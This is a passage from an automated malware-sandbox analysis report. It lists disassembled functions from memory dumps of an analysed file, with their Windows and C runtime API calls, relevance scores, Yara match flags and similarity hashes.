                                            • Instruction Fuzzy Hash: 61D1BDB5E042689FDF14CFA8C9909EDBBF4FF58318F24456AE456EB351D630A941CB20
                                            Function 04D11BA7 Relevance: 6.3, APIs: 4, Instructions: 293networkfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04D11C3C
                                            • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04D11C5F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileInternet$PointerRead
                                            • String ID:
                                            • API String ID: 3197321146-0
                                            • Opcode ID: 1885a8dfee8479765fa90636c8dddbf3c0bf84813e2bd3c7ed7779aacb4cd4c8
                                            • Instruction ID: 260dde4263ead14417981b52c7cfba8d79550e4a88f79ea14ec7974bf7de0489
                                            • Opcode Fuzzy Hash: 1885a8dfee8479765fa90636c8dddbf3c0bf84813e2bd3c7ed7779aacb4cd4c8
                                            • Instruction Fuzzy Hash: 24C139B1A00218AFEB25CF54DC84BD9B7B5FF49304F1041D9E909A72A0D771BA94CFA5
                                            Function 0040BA64 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: AdjustPointer
                                            • String ID:
                                            • API String ID: 1740715915-0
                                            • Opcode ID: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                            • Instruction ID: c3f9129e04d39096db86ee3dbd798fa579d010b72ca6babdac1055268f0b1971
                                            • Opcode Fuzzy Hash: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                            • Instruction Fuzzy Hash: F651A972600306ABEB298F11C881BAA77B4EF40714F14413FE802A76D5E739AC91CBDD
                                            Function 10003EDA Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: AdjustPointer
                                            • String ID:
                                            • API String ID: 1740715915-0
                                            • Opcode ID: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                            • Instruction ID: 9e97f9b43940e94c385e873cf65d718b9a08959cb0185780d8acf6a52a646172
                                            • Opcode Fuzzy Hash: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                            • Instruction Fuzzy Hash: 9D51BFB6A04202AFFB16CF11D941BAB77A8EF047D0F11856DEA05A72A9DB31EC40D794
                                            Function 04D1BCCB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AdjustPointer
                                            • String ID:
                                            • API String ID: 1740715915-0
                                            • Opcode ID: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                            • Instruction ID: 7723936c01f8e571fce888b529973d916696b26603d863f48d39ee99b7425814
                                            • Opcode Fuzzy Hash: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                            • Instruction Fuzzy Hash: 8C518171705606BFEB298F54F880BAA77A4FF44714F14452EED864A6B0E731F981C790
                                            Function 04D11837 Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                            Download Yara Rule
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 04D1183C
                                              • Part of subcall function 04D19AA9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04D19AB5
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,00000000,?,?,0042D884,?,?,?,0042DAF4), ref: 04D11872
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,?,0042D884,?,?,?,0042DAF4), ref: 04D118A9
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 04D119BE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                            • String ID:
                                            • API String ID: 2123813255-0
                                            • Opcode ID: 76bb2ae1955411a23ec2113ce7c3df1698fa8cdaa81397e4e46f03e77a8728ac
                                            • Instruction ID: 8c95ba85adaab4f2a0415ad367a6d6b55e2f1516e1bf0b14c95d0fe324838ea9
                                            • Opcode Fuzzy Hash: 76bb2ae1955411a23ec2113ce7c3df1698fa8cdaa81397e4e46f03e77a8728ac
                                            • Instruction Fuzzy Hash: 7A41F8F1B00304BBE7149F64AC85B5EB6F8EF49214F100669EE6AD72A0E771B904C7A1
                                            Function 10007BCE Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70
                                            • GetLastError.KERNEL32 ref: 10007C36
                                            • __dosmaperr.LIBCMT ref: 10007C3D
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
                                            • __dosmaperr.LIBCMT ref: 10007C83
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 1913693674-0
                                            • Opcode ID: c5759a61a7976f34472f3230490c401b0bdcfc1ff84e849ca2e690b48099d67c
                                            • Instruction ID: 4d86bd2ae757562d8160192595c5732c56f34f1228d97d68919d00ee2a874974
                                            • Opcode Fuzzy Hash: c5759a61a7976f34472f3230490c401b0bdcfc1ff84e849ca2e690b48099d67c
                                            • Instruction Fuzzy Hash: 9021AC75A00216AFB720DF658C85D5BB7ADFF042E4B108529FA699724ADB35EC408BA0
                                            Function 10008336 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7fde20d58f3e1108cd5a86cb085c551b539ad6d33639cd9718ad33b154971d06
                                            • Instruction ID: d1df9cd49d1a9d965a935ddcfcfd3b9185eaf4079d6f623355f3cc1fa6217373
                                            • Opcode Fuzzy Hash: 7fde20d58f3e1108cd5a86cb085c551b539ad6d33639cd9718ad33b154971d06
                                            • Instruction Fuzzy Hash: C821D075A00206BFF710DF61CC8090B779CFF846E47108124FA949215AEB31EF0087A0
                                            Function 004174A4 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00414F58: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151BB,?,00000000,-00000008), ref: 00414FB9
                                            • GetLastError.KERNEL32 ref: 00417508
                                            • __dosmaperr.LIBCMT ref: 0041750F
                                            • GetLastError.KERNEL32(?,?,?,?), ref: 00417549
                                            • __dosmaperr.LIBCMT ref: 00417550
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 1913693674-0
                                            • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                            • Instruction ID: 408a06d1cf8366b2ae1f3811782f7cd1de2d149ac6df674c503089c6b33b154d
                                            • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                            • Instruction Fuzzy Hash: 2B21CD716042057FDB20AF66C880CAB7779EF44368710852AF91997751D739ED818768
                                            Function 04D2770B Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 04D251BF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04D25422,?,00000000,-00000008), ref: 04D25220
                                            • GetLastError.KERNEL32 ref: 04D2776F
                                            • __dosmaperr.LIBCMT ref: 04D27776
                                            • GetLastError.KERNEL32(?,?,?,?), ref: 04D277B0
                                            • __dosmaperr.LIBCMT ref: 04D277B7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 1913693674-0
                                            • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                            • Instruction ID: 280c399ba042579c2fc3ae47cebecef15212a04233ce6ae6dae1112c47091d77
                                            • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                            • Instruction Fuzzy Hash: ED219271700226BFAB30AF71DE80C6BB7A9FF1826C7108528E92997150E730FC018770
                                            Function 004111DB Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                            • Instruction ID: c7293b4e2709a45a538168f771ca0d14dcb5837bd486a4ca313c9b6cb4d0090e
                                            • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                            • Instruction Fuzzy Hash: DF21C971600219AFDB20AF659C40DEB776DAF44368B10456BFA29E7261D738DC8187A8
                                            Function 04D21442 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                            • Instruction ID: a904d35281b7c39fd1926154ce7aed044de77ccbcc410fb24b39f756da913375
                                            • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                            • Instruction Fuzzy Hash: AF21A431300626BFAB10AFA49E8496F77BAFF5426C700C525E91A97150E730FC0187A0
                                            Function 00418445 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetEnvironmentStringsW.KERNEL32 ref: 0041844D
                                              • Part of subcall function 00414F58: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151BB,?,00000000,-00000008), ref: 00414FB9
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00418485
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184A5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 158306478-0
                                            • Opcode ID: 42e04dca39cc9313a1bac36138922e873b2761e214a8738c343e5be4cc190242
                                            • Instruction ID: 9202fe00a5822ec58f1db5debff3a6e736622b39abe9cc99b2a2d556b75614f5
                                            • Opcode Fuzzy Hash: 42e04dca39cc9313a1bac36138922e873b2761e214a8738c343e5be4cc190242
                                            • Instruction Fuzzy Hash: A01104B65005167F6B212BB25D89CEF295CDF89398721402EF905A1201FE2CDE8241BE
                                            Function 04D235A0 Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • FreeLibrary.KERNEL32(00000000,?,04D236AF,04D137FE,?,00000000,04D12A70,04D12A72,?,04D23828,00000022,00420B0C,00422950,00422958,04D12A70), ref: 04D23661
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                            • Instruction ID: 746fdf7cb4bd243c65a63a4065a865ec1cf90f89ac346b1e7bfdbe2ba18d3142
                                            • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                            • Instruction Fuzzy Hash: 95210571B01221ABC7319F34ED44B9A3B6DEB51B69F110130ED05A7391DB38FE02CA94
                                            Function 04D286AC Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetEnvironmentStringsW.KERNEL32 ref: 04D286B4
                                              • Part of subcall function 04D251BF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04D25422,?,00000000,-00000008), ref: 04D25220
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 04D286EC
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 04D2870C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 158306478-0
                                            • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                                            • Instruction ID: 6b450834c98b68d0c06934e978a113414a26fef8d8b2b0790b71c5f12996d638
                                            • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                                            • Instruction Fuzzy Hash: 5211C4B6A0113A7E7B213B725ECCCBF2DADDEA919D7100234F905A2100FA64EE0191B5
                                            Function 0041CBE8 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000), ref: 0041CBFF
                                            • GetLastError.KERNEL32(?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000,00000000,00000000,?,0041A021,?), ref: 0041CC0B
                                              • Part of subcall function 0041CBD1: CloseHandle.KERNEL32(FFFFFFFE,0041CC1B,?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000,00000000,00000000), ref: 0041CBE1
                                            • ___initconout.LIBCMT ref: 0041CC1B
                                              • Part of subcall function 0041CB93: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041CBC2,0041C84C,00000000,?,00419A7E,00000000,00000000,00000000,00000000), ref: 0041CBA6
                                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000,00000000), ref: 0041CC30
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                            • String ID:
                                            • API String ID: 2744216297-0
                                            • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                            • Instruction ID: b2f8e5e77f4d676ad0e685e0439cc39e0844638a97b8ad054d7e4805cd8d945f
                                            • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                            • Instruction Fuzzy Hash: D6F01C36580118BBCF221F95ED45ADA3F26FF497A0B404031FA0D96121D6328C619BD8
                                            Function 1000CD22 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
                                            • GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45
                                              • Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B
                                            • ___initconout.LIBCMT ref: 1000CD55
                                              • Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0
                                            • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                            • String ID:
                                            • API String ID: 2744216297-0
                                            • Opcode ID: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                            • Instruction ID: e182fa176b596d651ba3484f1012657cf00b5fef4cb1dd311ab1bc31a0a6f155
                                            • Opcode Fuzzy Hash: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                            • Instruction Fuzzy Hash: 53F030368002A9BBEF125F95CC48EC93FA6FB0D3E0F018025FA0885130DA32C9609B90
                                            Function 04D2CE4F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,04D2CAC6,00000000,00000001,?,00000000,?,04D29CE5,00000000,00000000,00000000), ref: 04D2CE66
                                            • GetLastError.KERNEL32(?,04D2CAC6,00000000,00000001,?,00000000,?,04D29CE5,00000000,00000000,00000000,00000000,00000000,?,04D2A288,?), ref: 04D2CE72
                                              • Part of subcall function 04D2CE38: CloseHandle.KERNEL32(0042CA30,04D2CE82,?,04D2CAC6,00000000,00000001,?,00000000,?,04D29CE5,00000000,00000000,00000000,00000000,00000000), ref: 04D2CE48
                                            • ___initconout.LIBCMT ref: 04D2CE82
                                              • Part of subcall function 04D2CDFA: CreateFileW.KERNEL32(00428728,40000000,00000003,00000000,00000003,00000000,00000000,04D2CE29,04D2CAB3,00000000,?,04D29CE5,00000000,00000000,00000000,00000000), ref: 04D2CE0D
                                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,04D2CAC6,00000000,00000001,?,00000000,?,04D29CE5,00000000,00000000,00000000,00000000), ref: 04D2CE97
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                            • String ID:
                                            • API String ID: 2744216297-0
                                            • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                            • Instruction ID: ba32f5e7c7f589ee395ab4612f280422cb2f8a981fbc1d83efa3df1cc017ee2f
                                            • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                            • Instruction Fuzzy Hash: 25F0303A550128BBCF725F95DD04ADD3F26FF08AA5B404030FA2996130D7329C219BD5
                                            Function 00409D0D Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                            Download Yara Rule
                                            APIs
                                            • SleepConditionVariableCS.KERNELBASE(?,00409CAA,00000064), ref: 00409D30
                                            • LeaveCriticalSection.KERNEL32(0042D064,00401044,?,00409CAA,00000064,?,?,?,00401044,0042DA8C), ref: 00409D3A
                                            • WaitForSingleObjectEx.KERNEL32(00401044,00000000,?,00409CAA,00000064,?,?,?,00401044,0042DA8C), ref: 00409D4B
                                            • EnterCriticalSection.KERNEL32(0042D064,?,00409CAA,00000064,?,?,?,00401044,0042DA8C), ref: 00409D52
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                            • String ID:
                                            • API String ID: 3269011525-0
                                            • Opcode ID: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                                            • Instruction ID: ed1c7c09b24d5124ebc712e1e7f2573f2e40a4f9289d25860d0ee5ca28a3c269
                                            • Opcode Fuzzy Hash: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                                            • Instruction Fuzzy Hash: 8FE0ED31A85628FBCB111B50FC09AD97F24AF09759F508032F90976171C7795D039BDD
                                            Function 00410EDD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                            Download Yara Rule
                                            APIs
                                            • __startOneArgErrorHandling.LIBCMT ref: 00410F6D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ErrorHandling__start
                                            • String ID: pow
                                            • API String ID: 3213639722-2276729525
                                            • Opcode ID: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                                            • Instruction ID: 1dd945e64f0d07477a36e3934c2b0d008af5dc79b4df0e8c4bba017ec81d751d
                                            • Opcode Fuzzy Hash: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                                            • Instruction Fuzzy Hash: 65512B75A0820296CB217714DA023EB6BA49B40750F618D6FF095463E9EBBCCCD7DA4E
                                            Function 00409590 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 183COMMON
                                            Download Yara Rule
                                            APIs
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 004096CE
                                            • std::_Xinvalid_argument.LIBCPMT ref: 004096E5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_
                                            • String ID: vector too long
                                            • API String ID: 3646673767-2873823879
                                            • Opcode ID: 76399865d75423f55fc174df7396f940014b7bb3f785ca2fba6546e7ea2eb098
                                            • Instruction ID: f4da2a5e80598445161bac14147e50f437b92e93805fe79093e1120e4695fd56
                                            • Opcode Fuzzy Hash: 76399865d75423f55fc174df7396f940014b7bb3f785ca2fba6546e7ea2eb098
                                            • Instruction Fuzzy Hash: 5A5125B2E002159BCB14DF69C84066EB7A5EF80314F10067FE805FB382EB75AD408BD5
                                            Function 04D1BA27 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                            Download Yara Rule
                                            APIs
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 04D1BA66
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 04D1BB1A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3480331319-1018135373
                                            • Opcode ID: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                            • Instruction ID: 2e5bb38c2ab6c062edae79d4077ab7c348a514ec97dfb4f641ac42324fab9e76
                                            • Opcode Fuzzy Hash: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                            • Instruction Fuzzy Hash: 97418E34B00218ABDF10DF68E884A9EBBB5FF45318F148056EC15AB362D775BA15CBA1
                                            Function 0040C060 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0040C085
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: EncodePointer
                                            • String ID: MOC$RCC
                                            • API String ID: 2118026453-2084237596
                                            • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
